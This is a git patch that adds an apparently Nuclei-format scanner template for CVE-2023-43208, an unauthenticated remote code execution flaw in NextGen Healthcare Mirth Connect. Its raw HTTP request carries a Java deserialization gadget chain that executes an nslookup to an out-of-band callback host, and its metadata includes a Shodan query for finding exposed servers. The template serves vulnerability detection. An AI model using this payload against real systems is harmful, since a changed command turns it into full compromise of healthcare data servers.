From 7da719de3bea68c7205de5edfdab945d162ad87f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 1 May 2024 11:48:03 +0530 Subject: [PATCH] Create CVE-2023-43208.yaml --- http/cves/2023/CVE-2023-43208.yaml | 106 +++++++++++++++++++++++++++++ 1 file changed, 106 insertions(+) create mode 100644 http/cves/2023/CVE-2023-43208.yaml diff --git a/http/cves/2023/CVE-2023-43208.yaml b/http/cves/2023/CVE-2023-43208.yaml new file mode 100644 index 0000000000..a1a9c1ca94 --- /dev/null +++ b/http/cves/2023/CVE-2023-43208.yaml @@ -0,0 +1,106 @@ +id: CVE-2023-43208 + +info: + name: NextGen Healthcare Mirth Connect - Remote Code Execution + author: princechaddha + severity: critical + description: Unauthenticated remote code execution vulnerability in NextGen Healthcare Mirth Connect before version 4.4.1. + impact: | + Successful exploitation could result in unauthorized access and potential compromise of sensitive data. + remediation: | + Apply the vendor-supplied patch or upgrade to a non-vulnerable version. + reference: + - http://packetstormsecurity.com/files/176920/Mirth-Connect-4.4.0-Remote-Command-Execution.html + - https://github.com/nvn1729/advisories + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-43208 + epss-score: 0.00349 + epss-percentile: 0.71422 + cpe: cpe:2.3:a:nextgen:mirth_connect:*:*:*:*:*:*:*:* + metadata: + vendor: nextgen + product: mirth_connect + shodan-query: title:"mirth connect administrator" + tags: cve,cve2023,nextgen,rce + +http: + - raw: + - | + GET /api/server/version HTTP/1.1 + Host: {{Hostname}} + X-Requested-With: OpenAPI + - | + POST /api/users HTTP/1.1 + Host: {{Hostname}} + X-Requested-With: OpenAPI + Content-Type: application/xml + + + abcd + + java.lang.Comparable + + + + + java.lang.Runtime + + + getMethod + + java.lang.String + [Ljava.lang.Class; + + + getRuntime + + + + + invoke + + java.lang.Object + [Ljava.lang.Object; + + + + + + + + exec + + java.lang.String + + + nslookup {{interactsh-url}} + + + + + transform + + compareTo + + + + + + matchers: + - type: dsl + dsl: + - 'compare_versions(version, "<4.4.1")' + - 'contains(interactsh_protocol, "dns")' + - 'status_code_1 == 200 && status_code_2 == 500' + condition: and + + extractors: + - type: regex + part: body_1 + name: version + group: 1 + regex: + - '(.*)' + internal: true